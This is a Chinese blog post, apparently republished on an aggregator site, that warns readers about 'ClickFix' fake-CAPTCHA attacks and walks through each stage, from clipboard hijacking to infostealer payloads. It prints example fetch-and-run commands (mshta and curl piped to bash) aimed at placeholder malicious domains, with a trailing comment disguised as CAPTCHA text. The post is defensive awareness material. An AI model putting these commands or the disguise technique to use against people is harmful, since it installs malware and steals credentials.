当前位置：首页 > article >正文

【踩坑】你以为在过人机验证，实际上正亲手把木马装进电脑 | ClickFix攻击

article 2026/5/2 7:04:47

转载请注明出处小锋学长生活大爆炸[xfxuezhagn.cn]如果本文帮助到了你欢迎[点赞、收藏、关注]哦~学长今天在日常逛软件分享网站时候跳出来一个谷歌人机验证一开始没在意但跟选图片的验证不一样的是这次跳出来一个要终端输入命令的验证。得亏学长平时刷各种小网站看得多意识到这就是个钓鱼验证估计是这个网站被黑客劫持了。这些指令看似无害但如果你按照步骤操作实际上会感染恶意软件很可能是信息窃取程序。原理解析这种攻击之所以被称为“ClickFix”是因为它本质上是一场精心的心理博弈社会工程学而不是利用系统漏洞。它的原理大概是这样的第一步诱导访问恶意页面页面会伪装成 Cloudflare 验证、Google reCAPTCHA 或微软服务界面看起来非常正规。也可能某些老实本分的网站被黑客攻击后注入恶意代码。第二步伪造验证界面页面会显示一个假的 Im not a robot 复选框。用户点击后页面不会显示正常的图片验证而是弹出额外验证步骤声称需要进一步证明你是人类。甚至代码与正规的reCAPTCHA验证都不一样第三步剪贴板劫持核心攻击手法这是最关键的技术环节。在用户与页面交互的过程中例如点击复制按钮或勾选复选框时恶意 JavaScript 会在后台执行类似document.execCommand(copy)或Clipboard API将一段经过混淆的恶意命令悄悄写入用户的剪贴板。在基于 Chromium 内核的浏览器几乎所有主流浏览器都是如此中网站只有在获得你的许可后才能写入剪贴板。但 Windows 系统误以为你在第一个屏幕上勾选复选框时已经同意了这一操作。并且页面上显示的只是你粘贴的内容的最后一部分而你看到的并不是命令的真正部分而只是添加到命令后面的注释在正常情况下这就是我们所能看到的目标对象被指示粘贴的第一部分内容是以下几种变体有时会进行模糊处理mshta https://{malicious.domain}/media.fileMshta 命令会触发合法的 Windows 可执行文件 mshta.exe。但 mshta 会从指定的域中获取恶意媒体文件并运行它。该媒体文件的名称可能看起来完全正常。这些文件实际上是一个经过编码的 PowerShell 命令它会在后台隐蔽运行并下载实际的有效载荷。也可能剪贴板里的内容已经被替换成了一串复杂的 Base64 加密字符或直接的 curl 下载指令比如# 前面是恶意命令被隐藏 curl -s https://malicious.domain/payload.sh | bash # 后面是显示给用户的无害文本作为注释或命令的一部分 # I am not a robot - reCAPTCHA Verification ID: 48164第四步用户自行执行恶意命令用户按照指示• 打开 TerminalmacOS或 Run 对话框/PowerShellWindows• 按 Command V或 Ctrl V粘贴• 按 Enter 执行传统的恶意软件往往通过“下载文件并让用户点击安装”来传播这种方式容易被浏览器的安全拦截如 Chrome 的“此文件可能对您的计算机有害”或系统的安全中心Gatekeeper发现。而终端是系统的底层管理工具权限极高。因此攻击者引导你直接在 Terminal终端运行代码当你手动粘贴代码并回车时系统会认为这是用户授权的合法操作从而绕过大多数浏览器的下载安全检测安全软件通常也不会拦截用户在 Terminal 中手动执行的命令。第五步下载并执行恶意负载一旦命令执行通常会• 使用 curl 或 mshta 等合法系统工具从远程服务器下载恶意脚本• 脚本可能下载信息窃取器如 Lumma Stealer、Atomic macOS Stealer、Amos Stealer• 窃取浏览器保存的密码、Cookie、加密货币钱包、自动填充数据等• 建立持久化机制添加启动项、创建计划任务等• 清除剪贴板内容以隐藏痕迹为什么这种攻击有效因素说明信任滥用用户熟悉 reCAPTCHA 界面降低了警惕性用户自主执行绕过所有自动防护属于Living off the land攻击视觉欺骗只显示命令的无害尾部隐藏真正的恶意代码紧迫感配合倒计时、错误提示等制造心理压力跨平台可针对 WindowsPowerShell/Run、macOSTerminal、Linux 定制这类攻击在 2024-2025 年激增超过500%已成为增长最快的社会工程学威胁之一。记住真正的验证码只在网页内点击复选框或选择图片、绝不会要求你打开系统终端、绝不会让你粘贴并执行代码。

【踩坑】你以为在过人机验证，实际上正亲手把木马装进电脑 | ClickFix攻击

相关文章：

【踩坑】你以为在过人机验证，实际上正亲手把木马装进电脑 | ClickFix攻击

操作系统(四)

从C++老手到Python新手：用你熟悉的CLion无缝切换，配置Python开发环境保姆级教程

26.单调栈

【C++入门】命名空间、缺省参数、函数重载

3分钟终极指南：用KMS智能激活脚本永久激活Windows和Office

必知必会：奖励模型训练与PPO稳定训练方法详解

必知必会：大模型对齐数据构造与PPO算法详解

ToastFish：如何在工作间隙悄无声息地提升英语词汇量？

不止画板子：用嘉立创EDA专业版搞定面板打印，从设计到下单全流程解析

基于Foundation Models框架的AI应用开发实战指南

树莓派PICO的板载LED还能这么玩？用MicroPython做个呼吸灯和SOS求救信号

基于MCP协议构建AI趋势分析工具：连接Google Trends与智能助手

MCP 2026医疗数据跨境传输新规生效在即：三甲医院已启动紧急审计，你还在用传统API网关？

OpenClaw时空之锚——从离散指令到硅基时空连续体的本体论坍缩（第二十二篇）

Provision CLI：将AI工作流转化为可复用技能，破解团队知识孤岛

LILYGO 7.5英寸电子墨水屏与ESP32开发实战指南

SOCD Cleaner终极指南：5分钟解决游戏按键冲突的免费方案

GEM框架下的强化学习环境设计与多智能体交互实践

Ex-Omni框架：用自然语言生成3D面部动画的实战指南

多模态AI技术助力听障沟通：HI-TransPA系统解析

从账单明细看 Taotoken 按 token 计费如何帮助项目厘清成本

qapyq：AI模型训练数据集的图像管理与标注工作站实战指南

基于Granite模型的本地智能体系统：RAG与图像研究实战

一个FIR IP搞定四路信号滤波：Xilinx Vivado 2017.4多通道复用实战（附Verilog源码）

【flutter for open harmony】第三方库Flutter 鸿蒙版 MD5加密实战指南（适配 1.0.0）✨

明辨是非4：一个父亲与七年级儿子的历史思辨课——历史的坐标：从哈拉和林到民族互化，如何理解征服与民族融合

CPU集群高效训练大模型：Horizon-LM方案解析

大型语言模型安全评估：红队测试方法与RedBench实践

SciDER系统：基于LLM的科研自动化平台解析